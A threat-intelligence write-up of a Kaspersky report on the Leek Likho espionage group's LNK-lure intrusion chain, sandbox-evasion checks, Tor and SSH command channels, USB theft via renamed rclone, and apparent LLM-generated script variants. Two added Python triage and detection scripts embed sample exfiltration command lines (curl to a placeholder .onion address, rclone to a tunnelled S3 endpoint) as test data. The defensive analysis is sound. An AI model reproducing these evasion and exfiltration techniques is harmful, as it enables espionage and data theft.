The threat actor known as Leek Likho has persisted in its targeted offensives against Russian entities, predominantly focusing on state institutions, while aggressively diversifying its malicious toolkit across disparate objectives. Security researchers at Kaspersky posit that the group may be leveraging Large Language Models (LLMs) to dynamically synthesize programmatic script variations, file naming conventions, and operational metadata. Notwithstanding these adaptations, the foundational compromise framework remains unchanged: a victim is enticed with an archive masquerading as an official PDF document which, once the shortcut inside it is opened, deploys a sophisticated sequence of PowerShell, Tor, OpenSSH, and rclone.
In a comprehensive treatise covering activities observed in 2026, Kaspersky dissected Leek Likho’s evolving methodology, a novel file exfiltration vector, and indications of AI-assisted asset generation. The collective—variously tracked by the monikers SkyCloak and Vortex Werewolf—initially gained prominence in 2025 following a string of targeted incursions against public sector organizations in Russia and Belarus, a campaign designated Operation SkyCloak. Between February and April 2026, analysts observed a continuation of this offensive lineage, accompanied by a refined data harvesting technique.
Leek Likho’s operational efficacy relies upon a potent convergence of social engineering, multi-stage delivery chains, and the weaponization of legitimate utilities. While the adversaries perpetually alter their command infrastructure, programming scripts, file nomenclatures, and obfuscation heuristics, the overarching mechanics of the intrusion remain static: the victim is manipulated into extracting an archive, a PowerShell script subsequently establishes persistent remote access components, an encrypted communication conduit is erected via Tor and SSH, and data is systematically exfiltrated utilizing rclone.
Initial ingress is predominantly orchestrated through Telegram. Victims receive a deceptive hyperlink mimicking a legitimate file download page within the messaging platform; alternatively, the attackers occasionally exploit Dropbox. Traversing this link precipitates the download of a compressed ZIP archive containing a contextual lure.
The core deception exploits a disparity in how file compression utilities render archives. The native Windows interface displays an object that convincingly mirrors a conventional PDF document—such as an administrative decree or a training directive. However, when inspected via a utility such as 7-Zip, the authentic file extension is revealed as .pdf.lnk. A representative artifact cited in the report is titled Proekt_prikaza_681_o_pooshchrenii.pdf.lnk. The shortcut file is explicitly configured to inherit a PDF icon from Microsoft Edge, ensuring visual plausibility during superficial examination.
Nestled within the primary archive is a concealed directory containing a secondary compressed container. This repository houses an array of utility binaries disguised as ubiquitous applications. For instance, datagrip.exe functions as a repackaged Tor client, while messenger.exe cloaks an OpenSSH component; ancillary files orchestrate local SSH and SFTP connections. These appellations are meticulously selected to mirror routine software dependencies, thereby minimizing suspicion when nestled within the user’s localized AppData folder.
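An added example, not code from the Kaspersky report, showing how a triage script can surface the archive tricks described above: a shortcut whose name carries a document extension before `.lnk`, a nested ZIP, and executables inside that nested ZIP. The sample archive is constructed in memory with placeholder bytes; the folder name `cache/` and the use of the MS-DOS hidden attribute to conceal the nested archive are assumptions, since the report does not say how the directory is concealed.

```python
import io
import zipfile

FILE_ATTRIBUTE_HIDDEN = 0x02   # MS-DOS/Windows attribute bit kept in a ZIP member's external_attr
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")

def build_sample_archive():
    """Constructed sample modelled on the reported layout: a .pdf.lnk lure at the top
    level and a hidden nested ZIP of renamed tools. Every member is placeholder bytes."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("datagrip.exe", b"placeholder")    # name the report ties to a renamed Tor client
        z.writestr("messenger.exe", b"placeholder")   # name the report ties to a renamed OpenSSH build
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Proekt_prikaza_681_o_pooshchrenii.pdf.lnk", b"L\x00\x00\x00")
        nested = zipfile.ZipInfo("cache/payload.zip")   # assumed folder and file names
        nested.external_attr = FILE_ATTRIBUTE_HIDDEN    # assumption: concealed via the hidden attribute
        z.writestr(nested, inner.getvalue())
    return outer.getvalue()

def inspect_archive(data, depth=0):
    """Return findings for one ZIP, recursing into any nested ZIP members."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            name = info.filename
            base = name.lower().rsplit("/", 1)[-1]
            hidden = bool(info.external_attr & FILE_ATTRIBUTE_HIDDEN)
            if base.endswith(".lnk"):
                # Explorer never shows the .lnk suffix, so "x.pdf.lnk" is rendered as "x.pdf"
                kind = "double-extension" if base[:-4].endswith(DOC_EXTS) else "plain"
                findings.append(f"{kind} shortcut: {name}")
            if base.endswith(".exe") and depth > 0:
                findings.append(f"executable inside nested archive: {name}")
            if base.endswith(".zip"):
                where = "hidden entry" if hidden else "entry"
                findings.append(f"nested archive ({where}): {name}")
                findings.extend(inspect_archive(z.read(info), depth + 1))
    return findings

if __name__ == "__main__":
    for line in inspect_archive(build_sample_archive()):
        print(line)
```

Run against a real submission, the same function flags any archive whose top-level member is a shortcut dressed as a document, regardless of the lure's specific name.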
Upon activation, the LNK file initializes the first phase of infection, dubbed LeekSower. The payload invokes PowerShell, locates the original ZIP container within the user profile, extracts its contents into AppData, locates the nested archive, and executes the subsequent programmatic routine, known as LeekGerminator.
LeekGerminator initially executes a rigid environmental diagnostic evaluation. To authorize further execution, the system’s recent documents directory must contain upwards of ten LNK files, and the operating system must concurrently host more than fifty active processes. Should these thresholds fail to materialize, the infection sequence terminates immediately. This defensive countermeasure enables the malicious architecture to evade automated sandbox analysis and virtualized security environments.
Provided the host passes these environmental validations, LeekGerminator renders the decoy PDF to assuage user suspicion, purges transient forensic footprints, and instantiates a mutex to preclude overlapping executions. Subsequently, the script registers two obscured tasks within the Windows Task Scheduler: the first initializes the renamed OpenSSH server, while the second establishes a Tor instance under the guise of datagrip.exe. Both operations are invoked via conhost in a detached state, completely devoid of user-facing windows.
Communication with the command infrastructure is routed exclusively through Tor and SSH. Tor is configured with bridges and the obfs4 pluggable transport, which obfuscates traffic signatures to severely complicate detection at the network layer. The OpenSSH server is bound strictly to the loopback address 127.0.0.1 and mandates public-key authentication rather than passwords. This architecture affords the adversaries a secure, encrypted pathway to the infected node without exposing services directly to the public internet.
Following the initiation of the Tor service, the script dispatches an outbound query to an encrypted .onion destination belonging to the command center. This transmission conveys the local username, the unique hidden Tor service identifier, and a specific version string of the malware file. The curl command executes up to 1,000 connection attempts, punctuated by three-second intervals, ensuring a resilient connection even amidst erratic network connectivity.
The novel exfiltration methodology highlighted in the treatise revolves around a module designated LeekYield. Once an SSH session to the host is established, the operator deploys an instance of rclone, renamed as bittorrent.exe, and schedules a task containing an encoded PowerShell directive. The script actively polls for the insertion of USB storage media, clones the targeted data into a transient directory, and sorts files by their modification timestamps, prioritizing the most recent documents. The extraction routine allocates a strict maximum of three minutes per storage device.
The harvested file repositories are subsequently transmitted via rclone utilizing the S3 protocol to an external repository hosted at aunion. This transmission occurs over local port 12191 via a pre-established cryptographic tunnel. Fundamentally, the aggressors forgo the development of a proprietary exfiltration tool, opting instead to embed a legitimate, highly reliable cloud storage management utility into their malicious chain.
A separate section of the report delineates the industrialization of the group’s malware manufacturing. For every distinct target, Leek Likho prepares bespoke iterations of lures and system components. LNK files feature altered administrative document indices, the binaries within the secondary container receive unique names mimicking localized software, and the underpinning scripts feature randomized variables, functional strings, and task identifiers.
Investigators observed that identical programmatic actions across separate builds were executed through divergent coding techniques, with superfluous instructions occasionally introduced without altering the ultimate functional outcome. Crucially, the foundational infection topology remained uniform. Kaspersky analysts conclude that these stylistic anomalies strongly point to the deployment of Large Language Models to automate the generation of script variations and naming patterns.
This automated paradigm allows Leek Likho to systematically circumvent static signature-based security controls and complicates forensic file identification. Nonetheless, the systemic behavioral markers of the assault remain highly conspicuous: the invocation of PowerShell from an LNK file, the instantiation of concealed scheduled tasks, the execution of an unverified Tor binary, communication with .onion network nodes, localized SSH access, and automated data synchronization via rclone. Kaspersky emphasizes that such indicators can be effectively identified and blocked through robust EDR implementation and meticulous network traffic analysis.
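An added detection example, not code from the Kaspersky report, that checks the behavioral markers listed above against process-creation events. Field names follow Sysmon Event ID 1 (Image, ParentImage, OriginalFileName, CommandLine); the events themselves are constructed, and the exact command lines for the renamed Tor, sshd, curl and rclone processes are assumptions about how such tools could appear, not indicators taken from the report.

```python
import re

# Constructed Sysmon-style events; paths and arguments are illustrative only.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe -w hidden -c Expand-Archive"},
    {"Image": r"C:\Users\u\AppData\Local\DataGrip\datagrip.exe", "OriginalFileName": "tor.exe",
     "ParentImage": r"C:\Windows\System32\conhost.exe", "CommandLine": "datagrip.exe -f torrc"},
    {"Image": r"C:\Users\u\AppData\Local\Messenger\messenger.exe", "OriginalFileName": "sshd.exe",
     "ParentImage": r"C:\Windows\System32\conhost.exe",
     "CommandLine": "messenger.exe -f sshd_config -o ListenAddress=127.0.0.1"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "curl.exe --socks5-hostname 127.0.0.1:9050 http://PLACEHOLDERADDRESS.onion/"},
    {"Image": r"C:\Users\u\AppData\Local\BitTorrent\bittorrent.exe", "OriginalFileName": "rclone.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"bittorrent.exe copy C:\Users\u\AppData\Local\Temp\usb s3remote: --s3-endpoint http://127.0.0.1:12191"},
]

# PE version-info names of the legitimate tools the report says were renamed.
RENAMED_TOOLS = {"tor.exe": "Tor", "sshd.exe": "OpenSSH server", "rclone.exe": "rclone"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the markers from the report that one process-creation event matches."""
    hits = []
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd, orig = event.get("CommandLine", ""), event.get("OriginalFileName", "").lower()
    if image == "powershell.exe" and parent == "explorer.exe":
        hits.append("PowerShell launched by Explorer (LNK double-click); weak alone, corroborate")
    if orig in RENAMED_TOOLS and orig != image:     # on-disk name disagrees with the PE's own name
        hits.append(f"{RENAMED_TOOLS[orig]} running under renamed image {image}")
    if parent == "conhost.exe" and "\\appdata\\" in event["Image"].lower():
        hits.append("conhost-launched binary from AppData (hidden scheduled-task action)")
    if ".onion" in cmd.lower():
        hits.append("command line references a .onion address")
    if re.search(r"listenaddress=127\.0\.0\.1", cmd, re.I):
        hits.append("SSH server bound to loopback only")
    if orig == "rclone.exe" and "s3" in cmd.lower() and re.search(r"127\.0\.0\.1:\d+", cmd):
        hits.append("rclone S3 transfer through a local tunnel port")
    return hits

def scan(events):
    return [(basename(e["Image"]), hit) for e in events for hit in evaluate(e)]

if __name__ == "__main__":
    for image, hit in scan(EVENTS):
        print(f"{image}: {hit}")
```

Each rule on its own would be noisy in a large estate; the value is in several of them firing from the same user profile within a short window.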